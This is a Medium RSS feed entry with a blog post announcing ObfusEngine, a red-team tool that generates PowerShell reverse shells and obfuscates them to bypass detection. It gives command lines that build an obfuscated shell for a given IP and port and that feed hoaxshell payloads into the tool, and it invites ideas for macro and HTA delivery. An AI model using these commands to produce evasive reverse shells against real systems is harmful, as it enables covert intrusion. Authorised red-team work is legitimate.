<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Vibhasdutta on Medium]]></title>
        <description><![CDATA[Stories by Vibhasdutta on Medium]]></description>
        <link>https://medium.com/@vibhasdutta11?source=rss-e142ca5606e5------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/0*IVcrGXjRovnIp-pa</url>
            <title>Stories by Vibhasdutta on Medium</title>
            <link>https://medium.com/@vibhasdutta11?source=rss-e142ca5606e5------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sat, 30 May 2026 02:21:17 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@vibhasdutta11/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Why I Built ObfusEngine ?]]></title>
            <link>https://medium.com/@vibhasdutta11/why-i-built-obfusengine-3ede602b81f4?source=rss-e142ca5606e5------2</link>
            <guid isPermaLink="false">https://medium.com/p/3ede602b81f4</guid>
            <category><![CDATA[reverse-shell]]></category>
            <category><![CDATA[python]]></category>
            <category><![CDATA[offensive-security]]></category>
            <category><![CDATA[obfuscation]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Vibhasdutta]]></dc:creator>
            <pubDate>Fri, 13 Jun 2025 07:20:12 GMT</pubDate>
            <atom:updated>2025-06-14T10:48:25.015Z</atom:updated>
            <content:encoded><![CDATA[<h3>Why I Built ObfusEngine ?</h3><p><strong>Red teaming</strong> often involves not just building payloads, but also <strong>bypassing detection systems</strong>. I found myself diving into tools like Invoke-Obfuscation, Hoaxshell, and Chameleon, but I wanted a <strong>modular, Python-based engine</strong> that could do it all interactively and supports multiple obfuscation techniques.</p><p>So I built <strong>ObfusEngine</strong> — an advanced script obfuscation tool for PowerShell payloads that offers automation, technique chaining, and real-time previews.</p><h4>Features I Focused On :</h4><ul><li>Clipboard Mode: Obfuscate payloads straight from your clipboard (inspired by Hoaxshell).</li><li>Reverse Shell Generator: Auto-create and obfuscate shells by entering just an IP and port.</li><li>Technique Chaining: Run InvokeStealth → Chameleon → PyFuscation in one go.</li><li>Interactive UI: Built using the rich library to provide clear, color-coded CLI UX.</li></ul><p><strong>Demo of ObfuseEngine :</strong></p><ul><li>You can use the ObfuseEngine both in argumented and interactive mode.</li></ul><pre>python3 ObfusEngine.py --ip 192.168.109.131 --port 4444 -t invoke  -e -v -oN Reverseed.ps1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kc-t-x0ztookPVJLsHs16w.png" /></figure><p>For Interactive mode use:</p><pre>python3 ObfusEngine.py</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-sOAl_4OsxhX-XHI7K6sJw.png" /></figure><p>All the output/result script will be Stored in the ObfusWorkspace so you can later on use them and also copied!! to your clipboard.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ztS6BrpOR7d9rQRHF2lY_Q.png" /></figure><p>You can also use it Hoaxshell for obfuscating its payloads</p><p>Run your Hoaxshell command with -r flag:</p><pre>hoaxshell -s &lt;ip&gt; -r</pre><p>Then run the ObfusEngine :</p><pre>python3 Obfusengine.py --hxshell -t invoke -e -oN Reverseed.ps1</pre><p>OR, run the ObfusEngine and use the clipboard option:</p><pre>python3 Obfusengine.py</pre><h3>❤️ Shoutouts &amp; Inspirations</h3><p>ObfusEngine wouldn’t exist without the amazing tools and research shared by the cybersecurity community. I’ve learned a lot from dissecting and integrating the following projects — <strong>huge thanks to these developers</strong>:</p><ul><li><strong>Invoke-PSObfuscation</strong> by <a href="https://github.com/gh0x0st/Invoke-PSObfuscation/tree/main">gh0x0st</a><br> <em>(Cmdlet, variable, class name, and comment-level obfuscation)</em></li><li><strong>Invoke-Stealth</strong> by <a href="https://github.com/JoelGMSec/Invoke-Stealth">JoelGMSec</a><br> <em>(Modular PowerShell obfuscation base used for command structure)</em></li><li><strong>BetterXencrypt</strong> by <a href="https://github.com/GetRektBoy724/BetterXencrypt">GetRektBoy724</a><br> <em>(Advanced encryption-based transformation of PowerShell scripts)</em></li><li><strong>Chameleon</strong> by <a href="https://github.com/klezVirus/chameleon">klezVirus</a><br> <em>(Layout disruption and special character evasion for payloads)</em></li><li><strong>PyFuscation</strong> by <a href="https://github.com/CBHue/PyFuscation">CBHue</a><br> <em>(Python script that applies multiple layers of obfuscation to PowerShell code)</em></li><li><strong>Hoaxshell</strong> by <a href="https://github.com/t3l3machus/hoaxshell">t3l3machus</a><br> <em>(Inspiration for clipboard-based payload input and simulation)</em></li></ul><h3><strong>Try It :</strong></h3><p>Check it out here: <a href="https://github.com/vibhasdutta/ObfusEngine">https://github.com/vibhasdutta/ObfusEngine</a></p><p>Waiting for your feedback or ideas? I’d love to add more techniques — especially ones involving HTA, macro .docm, or script delivery.</p><h4>My social links:</h4><p>GitHub -<a href="https://github.com/vibhasdutta?source=user_about----------------------e142ca5606e5----------------------">https://github.com/vibhasdutta</a></p><p>MyPortfolio-<a href="https://vibhasdutta.netlify.app/?source=user_about----------------------e142ca5606e5----------------------">https://vibhasdutta.netlify.app/</a></p><p>TryHackME-<a href="https://tryhackme.com/p/GhostNode?source=user_about----------------------e142ca5606e5----------------------">https://tryhackme.com/p/GhostNode</a></p><p>Linkedin-<a href="https://www.linkedin.com/in/vibhas-dutta-366119248/?source=user_about----------------------e142ca5606e5----------------------">https://www.linkedin.com/in/vibhas-dutta-366119248/</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3ede602b81f4" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>